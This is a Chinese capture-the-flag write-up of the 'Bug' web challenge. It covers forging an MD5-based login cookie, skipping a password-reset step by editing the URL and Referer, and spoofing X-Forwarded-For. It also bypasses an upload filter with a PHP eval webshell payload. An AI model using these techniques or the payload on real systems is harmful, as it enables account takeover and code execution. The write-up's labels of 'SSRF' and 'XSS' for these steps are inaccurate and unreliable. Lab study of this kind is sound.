攻防世界：web Bug
2021-09-10 19:18:51

靶場分析

這道題涉及到解密我是沒有想到的
拿到手，是一個登錄界面：

拿掃描器掃描，發(fā)現(xiàn)沒有其他的文件

分析可能存在的漏洞：

• SQL注入漏洞
• SQL二次注入漏洞
• 其他邏輯漏洞

經(jīng)過嘗試，前兩個漏洞都沒有，只有可能是最后一個漏洞了

登錄admin

我們登錄一個賬戶進去，點擊manager，發(fā)現(xiàn)彈窗提示：

猜想管理員的賬號是admin，回到注冊界面，注冊一個admin賬號：

顯示admin已經(jīng)被注冊，所以現(xiàn)在的目標(biāo)就是想辦法登錄進admin的賬號
回到登錄面板，我們多注冊幾個賬號并登錄，抓包觀察：


發(fā)現(xiàn)每次登錄都會返回一個user的cookie，而且多次登錄同一個賬戶，返回的cookie值是一樣的。
而且觀察到，這個字符串的位數(shù)是32位，猜想很有可能是md5加密
說明：這個userCookie的生成是有規(guī)律的MD5加密
看網(wǎng)上的答案是MD5(UID:username)的加密方法。
使用這種加密方法即可隨意登錄一個賬戶，然后點擊personal，這樣就可以看見他的信息了

但是網(wǎng)上的另一個大佬的方法是：

繞過了第一步的找回密碼認證，直接來到第二步,操作是：

• 修改了URL上的step=1為2
• 修改了Referer頭

確實，牛啊牛

偽造IP

如愿登錄admin之后打開manager，發(fā)現(xiàn)它對IP做了 加固

但是我們有辦法，這就是使用X-Forwarded-For:127.0.0.1實現(xiàn)SSRF注入
在報文里面加上這個，然后實行

就可以看到還是沒有flag

這個時候一般點下檢查還是會有提示的：

這個提示我們需要完成一些操作
看見filemanager，估計就是文件上傳

果然upload是有用的，但是里面也說了，只能是圖片文件
上傳一個PHP圖片，有Content-Type來進行甄別的，那就改動這個為image/gif吧
為了保險起見，文件名也改一改


沒用，怕不是對文件內(nèi)容做了過濾
最后經(jīng)過測試，如下的改動可以回顯出flag

<script language="php"> alert(@eval($_POST['cmd']))</script>

總結(jié)

• 不要總想著解密，md5不配凡人猜出來
• 第一步過不去可以嘗試第二步，記得把referer改成第一步的URL，然后把表示第一步的變量改成第二步的變量，比如step=1改成step=2
• IP出現(xiàn)問題直接上X-forwarded-For: 127.0.0.1
• 文件上傳漏洞，直接該Content-Type和文件名外，可能還對內(nèi)容做了過濾，這個時候就需要變通為XSS注入了
• 這道題考了，邏輯漏洞、身份驗證漏洞、文件上傳漏洞、XSS漏洞、SSRF漏洞